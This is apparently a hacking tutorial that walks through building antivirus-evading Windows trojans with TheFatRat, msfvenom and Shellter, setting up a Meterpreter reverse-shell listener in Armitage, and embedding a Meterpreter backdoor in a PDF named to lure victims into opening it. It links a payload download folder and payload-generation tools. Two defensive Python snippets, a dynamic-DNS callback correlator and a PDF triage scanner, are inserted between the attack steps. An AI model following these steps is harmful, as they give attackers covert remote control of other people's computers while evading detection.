Create Undetectable Payload:
Requirements:
Linux distribution of your choice.
TheFatRat
Metasploit
TheFatRat installation
Instructions on how to install TheFatRat:
git clone https://github.com/Screetsec/TheFatRat.git
cd TheFatRat
chmod +x setup.sh && ./setup.sh
Update
cd TheFatRat
./update && chmod +x setup.sh && ./setup.sh
Troubleshooting TheFatRat
Use the chk_tools script if setup.sh runs into problems. It checks that everything is at the right version to run TheFatRat and also provides a solution for any problem it finds.
cd TheFatRat
chmod +x chk_tools
./chk_tools
Tool Overview

Let's start by generating an undetectable payload: a backdoor with msfvenom.
Step 1. Type 1 to create a backdoor with msfvenom.
Step 2. Type 2 for Windows.
Step 3. Set LHOST and LPORT.
Step 4. Type 2 for the reverse_tcp payload.
Step 5. The payload file will be saved in the Tools folder under Desktop.
Step 6. Go there!
Trick 2
How To Create an Undetectable Trojan Using a Domain Name.

In this tutorial I am going to show you how to create an undetectable Meterpreter Trojan using a domain name. I have taken a few tutorials and built them into one. Part 1 is creating the DNS payload. Part 2 is creating the executable file. Part 3 is using both in Shellter to create your undetectable Trojan. Part 4 is setting up your listener using Armitage.
Things You Will Need:
Kali Linux
A No-IP account with a domain name
A forwarded port on your router
Shellter (https://www.shellterproject.com)
Part 1: Creating the DNS Payload
Using Kali:
Open Metasploit on Kali by typing msfconsole in a terminal.
Type use payload/windows/meterpreter/reverse_tcp_dns.
Type show options. This will show you that you need to set your lhost and lport.
Type set lhost (hostname you created, without http://).
Type set lport (port you have forwarded on your router set for the Kali machine).
Type generate -h. This will show you the options for generating the payload. You can choose different options but at least do the following.
Type generate -f (file name you choose for the payload) -p windows -t raw. Ex. generate -f DNS -p windows -t raw
Exit the terminal and click on Files. Your payload will be in your Home folder (unless you set an option for a different location).
Transfer the created payload to Windows. (Be aware that your AV might detect it in its current state.)
Part 2: Creating the Executable File in Windows
Choose the option that applies to you. (Important, as Shellter does not work with 64-bit executables.)
32-bit Windows - Navigate to C:\Windows\System32\iexpress.exe (right click and select Run as administrator)
64-bit Windows - Navigate to C:\Windows\SysWOW64\iexpress.exe (right click and select Run as administrator)
Choose Create new Self Extraction Directive File and click next.
Click next on the Package Purpose page.
Type the title of the package. (This can be anything you want) Ex: Notepad.exe
No Prompt, click next.
Do not display a license. Click next.
Click Add and choose any file on your computer. I chose Notepad.exe in the C:\Windows\System32 folder. Click Next.
Click the drop arrow and choose the file name you chose on the last screen. Click Next.
Choose Hidden and then click Next.
No Message. Click Next.
Click Browse and type a name for your malware file and a destination.
Check the Hide File Extracting Progress Animation from user. Click Next.
Select No restart and then click next.
You can then either choose to save the self extraction directive or don't save. Click Next.
Click Next again on the create Package. Then click Finish
Part 3: Using Both Created Files in Shellter to Create Your Trojan.
Open the folder that Shellter is in.
Right click on Shellter.exe and click Run as Administrator.
Type A for Auto.
Type N for No.
Type the location of your created EXE file from Part 2 and hit enter.
Let Shellter do its thing for 30 seconds to a minute.
When asked to choose a payload, type C for custom.
Type the location of the payload you created in Part 1 and hit enter.
Type N for No reflective DLL loader.
Hit enter and let Shellter finish doing its thing. If it says Injection Verified! you should have a working undetectable Trojan.
Hit enter to exit Shellter.
Part 4: Set Up Your Listener
You can either use Metasploit or Armitage. I prefer Armitage so my tutorial will be for that.
Go back to Kali.
Open Terminal and type msfupdate
Once it's done type apt-get install armitage.
Type msfdb init
Open Armitage
Click Connect
Click Yes
Once Armitage opens type: use exploit/multi/handler
Type set lhost 0.0.0.0
Type set lport (the port you forwarded in your router)
Type set payload windows/meterpreter/reverse_tcp_dns
Type set exitonsession false
(Optional.) Type set autorunscript migrate -f
(Optional.) Type set prependmigrate True
Type exploit -j
(Optional steps are to migrate the process automatically so the session does not end before you can do it manually)
Now you should be able to run your undetectable Trojan and get a Meterpreter session.
DO NOT Upload your created Executable to online sites such as Virus Total.
Payload Creation = https://mega.nz/folder/Ug9RFK5Z#nrZTlXMaJippG34v3g-fqA
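From the defender's side, the callback described in Trick 2 leaves a recognisable pair of events: a workstation resolves a dynamic-DNS hostname and then connects out to the address it was given. The following is an added example, not part of the original tutorial, that correlates the two; the suffix list, the 30-second window and both log layouts are assumptions, and the log lines are constructed.

```python
from datetime import datetime, timedelta

# Illustrative dynamic-DNS suffixes (an assumption; maintain your own list).
DYNDNS_SUFFIXES = ("ddns.net", "hopto.org", "zapto.org", "sytes.net")
WINDOW = timedelta(seconds=30)  # assumed gap between lookup and connection

# Constructed DNS log: (time, client, query name, answer IP)
DNS_LOG = [
    ("2024-01-10T09:00:01", "10.0.0.21", "updates.example.com", "198.51.100.7"),
    ("2024-01-10T09:00:05", "10.0.0.34", "lab-host.ddns.net", "203.0.113.50"),
    ("2024-01-10T09:03:00", "10.0.0.21", "cam.hopto.org", "203.0.113.77"),
]
# Constructed connection log: (time, client, destination IP, destination port)
CONN_LOG = [
    ("2024-01-10T09:00:02", "10.0.0.21", "198.51.100.7", 443),
    ("2024-01-10T09:00:06", "10.0.0.34", "203.0.113.50", 4444),
    ("2024-01-10T09:10:00", "10.0.0.21", "203.0.113.77", 8080),
]


def is_dyndns(name: str) -> bool:
    """True when the query name sits under a listed dynamic-DNS suffix."""
    name = name.rstrip(".").lower()
    return any(name == s or name.endswith("." + s) for s in DYNDNS_SUFFIXES)


def correlate(dns_log, conn_log, window=WINDOW):
    """Pair each dynamic-DNS lookup with a connection from the same client
    to the resolved address that follows within the window."""
    findings = []
    for ts, client, qname, answer in dns_log:
        if not is_dyndns(qname):
            continue
        asked = datetime.fromisoformat(ts)
        for cts, cclient, dst, port in conn_log:
            delay = datetime.fromisoformat(cts) - asked
            if cclient == client and dst == answer and timedelta(0) <= delay <= window:
                findings.append((client, qname, dst, port))
    return findings


if __name__ == "__main__":
    for finding in correlate(DNS_LOG, CONN_LOG):
        print("dynamic-DNS lookup followed by outbound connection:", finding)
```

The hopto.org lookup in the sample is not reported because the matching connection falls outside the window; widen the window or alert on the lookup alone if your environment has no legitimate dynamic-DNS use.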
TRICK 3:
How to Embed a backdoor in a PDF file.


Step 1) Run Metasploit
Step 2) Find the appropriate exploit.
I will search Metasploit's database for an exploit for Adobe PDF on Windows, using this command:
● Code: msf > search type:exploit platform:windows adobe pdf
You should see the exploit "exploit/windows/fileformat/adobe_pdf_embedded_exe", which we will use:
● Code: msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe
Step 3) Set the payload
I will use the Meterpreter payload again, because it is one of the most powerful payloads available to us:
● Code: msf exploit(adobe_pdf_embedded_exe) > set payload windows/meterpreter/reverse_tcp
Step 4) Set the exploit options
First, display the required options for the exploit:
● Code: msf exploit(adobe_pdf_embedded_exe) > show options
You can see that we must provide an existing PDF file to the INFILENAME option in which to embed the Meterpreter payload. I will call it "hemantexample.pdf":
● Code: msf exploit(adobe_pdf_embedded_exe) > set INFILENAME example.pdf
The next option is the output file name, FILENAME. Change this to something innocent that will attract users to open it:
● Code: msf exploit(adobe_pdf_embedded_exe) > set FILENAME recipes.pdf
Finally, we need to specify the LHOST, which is our (the attacker's) IP address. Mine is 192.168.1.8:
● Code: msf exploit(adobe_pdf_embedded_exe) > set LHOST 192.168.1.8
Step 5) Run the exploit.
Now that all the options are set, we can run the exploit like this:
● Code: msf exploit(adobe_pdf_embedded_exe) > exploit
Metasploit has created a PDF named recipes.pdf that contains the Meterpreter listener. Now, simply get users to open the PDF (social engineering again), and you will easily get instant control of their computer.
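A mail gateway or analyst can triage a PDF like the one produced in Trick 3 before anyone opens it by counting the name tokens an embedded-EXE document depends on. This is an added example, not part of the original tutorial or of Metasploit; it assumes the file carries an embedded-file stream together with a launch action, the verdict labels are hypothetical, and the sample bytes are constructed and non-functional.

```python
import re

# PDF name tokens worth counting during triage (the approach pdfid-style scanners take).
WATCHED = ("EmbeddedFile", "Launch", "OpenAction", "AA", "JavaScript", "JS")

# A PDF name is "/" followed by characters that are neither whitespace nor delimiters.
NAME_RE = re.compile(rb"/([^\x00\t\n\x0c\r ()<>\[\]{}/%]+)")
HEX_ESCAPE_RE = re.compile(rb"#([0-9A-Fa-f]{2})")


def decode_name(raw: bytes) -> str:
    """Undo #XX escapes so an obfuscated /L#61unch is counted as /Launch."""
    plain = HEX_ESCAPE_RE.sub(lambda m: bytes([int(m.group(1), 16)]), raw)
    return plain.decode("latin-1")


def count_names(data: bytes) -> dict:
    """Count watched name tokens in the uncompressed part of a PDF."""
    counts = dict.fromkeys(WATCHED, 0)
    for match in NAME_RE.finditer(data):
        name = decode_name(match.group(1))
        if name in counts:
            counts[name] += 1
    return counts


def triage_pdf(data: bytes) -> str:
    """Return 'block', 'review' or 'pass' (hypothetical verdict labels)."""
    c = count_names(data)
    runs_on_open = c["OpenAction"] or c["AA"]
    has_script = c["JavaScript"] or c["JS"]
    if c["Launch"] and c["EmbeddedFile"]:
        return "block"      # attached file plus a launch action
    if c["Launch"] or (runs_on_open and has_script):
        return "review"     # can start something without an attachment
    return "pass"


# Constructed, non-functional samples: just enough structure to carry the tokens.
SAMPLE_EMBEDDED = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /OpenAction 3 0 R >> endobj\n"
    b"2 0 obj << /Type /EmbeddedFile /Length 0 >> stream\nendstream endobj\n"
    b"3 0 obj << /Type /Action /S /L#61unch >> endobj\n%%EOF\n"
)
SAMPLE_PLAIN = b"%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n%%EOF\n"

if __name__ == "__main__":
    for label, blob in (("embedded", SAMPLE_EMBEDDED), ("plain", SAMPLE_PLAIN)):
        print(label, triage_pdf(blob), count_names(blob))
```

Names stored inside compressed object streams are not visible to this scan, so decompress the file first before relying on a "pass".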
Pixload – Advanced Image Payload Creating Tool
Pixload is an advanced set of tools that allows you to hide payloads within image files by either creating or injecting the intended payload into the desired image.
Source Link :-
https://github.com/chinarulezzz/pixload
How To Use This Tool :-
Pixload : Image Payload Creating/Injecting Tools 2019 (kalilinuxtutorials.com)
Pixload is a set of tools for creating/injecting payload into images. Useful references for better understanding of pixload and its use-cases
Some other payload creators
GitHub - g0tmi1k/msfpc: MSFvenom Payload Creator (MSFPC)
GitHub - Assassinumz/simple-payload-generator: SPG: Simple MSFVenom Payload Generator
GitHub - arismelachroinos/lscript: The LAZY script will make your life easier, and of course faster.
GitHub - chinarulezzz/pixload: Image Payload Creating/Injecting tools.
BONUS